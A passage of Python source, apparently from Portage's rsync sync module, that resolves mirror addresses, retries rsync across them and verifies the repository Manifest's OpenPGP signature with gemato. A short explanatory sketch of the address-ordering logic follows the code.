                if AF_INET6 is not None and addrinfos and \
                 addrinfos[0][0] == AF_INET6:
                    ips = ips_v6 + ips_v4
                else:
                    ips = ips_v4 + ips_v6

                for ip in ips:
                    uris.append(
                        syncuri.replace(
                            "//" + user_name + hostname + port + "/",
                            "//" + user_name + ip + port + "/", 1))

            if not uris:
                # With some configurations we need to use the plain hostname
                # rather than try to resolve the ip addresses (bug #340817).
                uris.append(syncuri)

            # reverse, for use with pop()
            uris.reverse()
            uris_orig = uris[:]

            effective_maxretries = maxretries
            if effective_maxretries < 0:
                effective_maxretries = len(uris) - 1

            local_state_unchanged = True
            while (1):
                if uris:
                    dosyncuri = uris.pop()
                elif maxretries < 0 or retries > maxretries:
                    writemsg("!!! Exhausted addresses for %s\n" %
                             _unicode_decode(hostname),
                             noiselevel=-1)
                    return (1, False)
                else:
                    uris.extend(uris_orig)
                    dosyncuri = uris.pop()

                if (retries == 0):
                    if "--ask" in opts:
                        uq = UserQuery(opts)
                        if uq.query("Do you want to sync your Portage tree " + \
                         "with the mirror at\n" + blue(dosyncuri) + bold("?"),
                         enter_invalid) == "No":
                            print()
                            print("Quitting.")
                            print()
                            sys.exit(128 + signal.SIGINT)
                    self.logger(self.xterm_titles,
                                ">>> Starting rsync with " + dosyncuri)
                    if "--quiet" not in opts:
                        print(">>> Starting rsync with " + dosyncuri + "...")
                else:
                    self.logger(self.xterm_titles,
                     ">>> Starting retry %d of %d with %s" % \
                      (retries, effective_maxretries, dosyncuri))
                    writemsg_stdout(
                     "\n\n>>> Starting retry %d of %d with %s\n" % \
                     (retries, effective_maxretries, dosyncuri), noiselevel=-1)

                if dosyncuri.startswith('ssh://'):
                    dosyncuri = dosyncuri[6:].replace('/', ':/', 1)

                unchanged, is_synced, exitcode, updatecache_flg = self._do_rsync(
                    dosyncuri, timestamp, opts)
                if not unchanged:
                    local_state_unchanged = False
                if is_synced:
                    break

                retries = retries + 1

                if maxretries < 0 or retries <= maxretries:
                    print(">>> Retrying...")
                else:
                    # over retries
                    # exit loop
                    exitcode = EXCEEDED_MAX_RETRIES
                    break
            self._process_exitcode(exitcode, dosyncuri, out, maxretries)

            # if synced successfully, verify now
            if exitcode == 0 and self.verify_metamanifest:
                if gemato is None:
                    writemsg_level(
                        "!!! Unable to verify: gemato-11.0+ is required\n",
                        level=logging.ERROR,
                        noiselevel=-1)
                    exitcode = 127
                else:
                    try:
                        # we always verify the Manifest signature, in case
                        # we had to deal with key revocation case
                        m = gemato.recursiveloader.ManifestRecursiveLoader(
                            os.path.join(self.repo.location, 'Manifest'),
                            verify_openpgp=True,
                            openpgp_env=openpgp_env,
                            max_jobs=self.verify_jobs)
                        if not m.openpgp_signed:
                            raise RuntimeError(
                                'OpenPGP signature not found on Manifest')

                        ts = m.find_timestamp()
                        if ts is None:
                            raise RuntimeError(
                                'Timestamp not found in Manifest')
                        if (self.max_age != 0
                                and (datetime.datetime.utcnow() - ts.ts).days >
                                self.max_age):
                            out.quiet = False
                            out.ewarn(
                                'Manifest is over %d days old, this is suspicious!'
                                % (self.max_age, ))
                            out.ewarn(
                                'You may want to try using another mirror and/or reporting this one:'
                            )
                            out.ewarn('  %s' % (dosyncuri, ))
                            out.ewarn('')
                            out.quiet = quiet

                        out.einfo('Manifest timestamp: %s UTC' % (ts.ts, ))
                        out.einfo('Valid OpenPGP signature found:')
                        out.einfo(
                            '- primary key: %s' %
                            (m.openpgp_signature.primary_key_fingerprint))
                        out.einfo('- subkey: %s' %
                                  (m.openpgp_signature.fingerprint))
                        out.einfo('- timestamp: %s UTC' %
                                  (m.openpgp_signature.timestamp))

                        # if nothing has changed, skip the actual Manifest
                        # verification
                        if not local_state_unchanged:
                            out.ebegin('Verifying %s' % (self.repo.location, ))
                            m.assert_directory_verifies()
                            out.eend(0)
                    except GematoException as e:
                        writemsg_level(
                            "!!! Manifest verification failed:\n%s\n" % (e, ),
                            level=logging.ERROR,
                            noiselevel=-1)
                        exitcode = 1

            return (exitcode, updatecache_flg)
        finally:
            if openpgp_env is not None:
                openpgp_env.close()
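The address-list construction in this rsync module boils down to: resolve the host, split the results by family, shuffle within each family, and order the lists so the family getaddrinfo() returned first is tried first; a compact sketch of that ordering (the helper name is illustrative, not from the original):

import random
import socket

def candidate_ips(hostname):
    # Shuffle within each family, but keep the first-returned family first.
    infos = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC, socket.SOCK_STREAM)
    ips_v4 = [a[4][0] for a in infos if a[0] == socket.AF_INET]
    ips_v6 = ["[%s]" % a[4][0] for a in infos if a[0] == socket.AF_INET6]
    random.shuffle(ips_v4)
    random.shuffle(ips_v6)
    if infos and infos[0][0] == socket.AF_INET6:
        return ips_v6 + ips_v4
    return ips_v4 + ips_v6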